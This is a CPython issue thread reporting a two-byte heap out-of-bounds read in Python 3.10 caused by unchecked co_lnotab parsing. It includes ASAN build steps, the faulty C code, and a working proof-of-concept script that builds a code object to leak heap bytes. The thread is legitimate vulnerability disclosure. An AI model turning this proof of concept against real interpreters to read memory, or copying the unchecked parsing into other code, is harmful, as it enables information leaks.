### ISSUE TITLE
Out of bound read of two bytes in 3.10 if code object `co_lnotab = b'\0'`

### ISSUE THREAD

**Issue by gpshead** [python/cpython#99975]
**Problem:** Out of bound read of two bytes if `co_lnotab = b'\0'`

**Report:** """
I've found two heap read out of bound in python 3.10 and 3.12 (and
probably 3.11) in the built-in library.
These are not critical bugs as they are caught by debug assertions and
allow to leak relatively little data (from 16 to 42 bits).
...
Here are the two proofs of concepts, I just wrote a little writeup and reproduction steps at the top of them.
I also added the fully symbolized ASAN crash reports.

TLDR: `co_positions` and `co_lnotab` are not properly bounds-checked, which is a problem only on adversarially constructed code objects
  which shouldn't be critical as it requires code execution, but it might be triggered by code by libraries that manipulate the code objects.
(I found this bug in a library, and I'm also contacting them to patch it)

Thank you,
Tommaso Fontana
""" - @zommiommy _(editor: I assume this is you? apologies if not!)_

_(editor: I'm splitting this out into two issues, one for 3.12 co_positions and another for 3.10 c_lnotab)_

# ASAN reproduction steps
```bash
# manually configure python with asan
OPT="-O0" CC="/usr/bin/clang" CFLAGS="-g" CXX="/usr/bin/clang++" CXXFLAGS="-g" ./configure --with-address-sanitizer --with-ensurepip=install --with-lto=no
# compile it
make -j24
# run the code
ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer) ./Python-3.10.8_asan/python ./poc_heap_leak_3.10.py
```

# Relevant code
from `Objects/codeobject.c`
```C
static void
advance(PyCodeAddressRange *bounds)
{
    bounds->ar_start = bounds->ar_end;
    int delta = ((unsigned char *)bounds->opaque.lo_next)[0];
    bounds->ar_end += delta;
    int ldelta = ((signed char *)bounds->opaque.lo_next)[1];
    bounds->opaque.lo_next += 2;
    if (ldelta == -128) {
        bounds->ar_line = -1;
    }
    else {
        bounds->opaque.computed_line += ldelta;
        bounds->ar_line = bounds->opaque.computed_line;
    }
}

int
PyLineTable_NextAddressRange(PyCodeAddressRange *range)
{
    if (at_end(range)) {
        return 0;
    }
    advance(range);
    while (range->ar_start == range->ar_end) {
        assert(!at_end(range)); // <========= this assert catches this bug
        advance(range);
    }
    return 1;
}
```

since bytes are saved with a trailing `\0` (this can be seen in `Objects/bytesobject.c` at `_PyBytes_fromSize`),
setting `co_lnotab = b'\0'` would result in a memory layout of `00 00 UB UB` where `UB` are some out of bound bytes.

Calling advance the first time would consume the first two known bytes, but because
```C
int delta = ((unsigned char *)bounds->opaque.lo_next)[0];
bounds->ar_end += delta;
```
the condition of the while is still satified, so we are able to execute an extra advance
which leaks the two consecutive bytes.

```
import types
import struct

# any value it's fine, but if line[2] - n is < 0 it would become a None
# so in order to leak as much data as possible, this value is ideal
n = 2**30 - 1
# The leak depends on where this buffer is allocated, so playing with its length
# or allocation point might help leak different things
lnotab = b"\x00"

c = types.CodeType(
    0, #code_obj.co_argcount, 
    0, #code_obj.co_posonlyargcount,
    0, #code_obj.co_kwonlyargcount, 
    0, #code_obj.co_nlocals,
    0, #code_obj.co_stacksize, 
    0, #code_obj.co_flags,
    b'', #code_obj.co_code, 
    tuple(), #code_obj.co_consts, 
    tuple(), #code_obj.co_names,
    tuple(), #code_obj.co_varnames, 
    '', #code_obj.co_filename,
    '', #code_obj.co_name, 
    n, #code_obj.co_firstlineno, 
    lnotab,#code_obj.co_lnotab,
    tuple(), #code_obj.co_freevars, 
    tuple(), #code_obj.co_cellvars,
)

line = next(c.co_lines())
leak1 = struct.pack("B", line[1] - line[0])
leak2 = struct.pack("b", line[2] - n)
print(leak1 + leak2, end=" ")
```

**Comment by gpshead** [comment]
@pablogsal FYI

**Comment by vstinner** [comment]
Python 3.11 has no co_lnotab anymore. Python 3.10 no longer accepts bugfixes. I close the issue.

Please reopen the issue if you can trigger the bug on Python 3.11 or newer.

**Comment by vstinner** [comment]
> (editor: I'm splitting this out into two issues, one for 3.12 co_positions and another for 3.10 c_lnotab)

Is there a different issue for Python 3.12?

**Comment by gpshead** [comment]
> > (editor: I'm splitting this out into two issues, one for 3.12 co_positions and another for 3.10 c_lnotab)
> 
> Is there a different issue for Python 3.12?

I believe that's https://github.com/python/cpython/issues/99974.
